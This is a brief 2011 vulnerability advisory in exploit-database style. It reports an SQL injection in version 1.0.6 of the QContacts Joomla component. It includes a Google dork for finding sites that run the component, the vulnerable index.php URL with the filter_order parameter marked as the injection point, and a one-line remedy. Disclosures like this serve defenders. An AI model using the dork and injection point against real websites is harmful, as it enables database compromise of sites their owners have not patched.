############################################################################# Exploit Title: *QContacts 1.0.6 (Joomla component) SQL injection*# Google Dork: inurl:"/components/com_qcontacts/"# Date: Decembar/08/2011# Author: Don (BalcanCrew & BalcanHack)# Software Link: *
http://www.latenight-coding.com/joomla-addons/qcontacts.html*# Version: 1.0.6# Tested on: Apache############################################################################
Vulnerability:
This vulnerability affects /index.php
*/index.php?option=com_qcontacts?=catid=0&filter_order=[SQLi]&filter_order_Dir=&option=com_qcontacts
*
How to fix this vulnerability:*Filter metacharacters from user input.**~Don 2011*
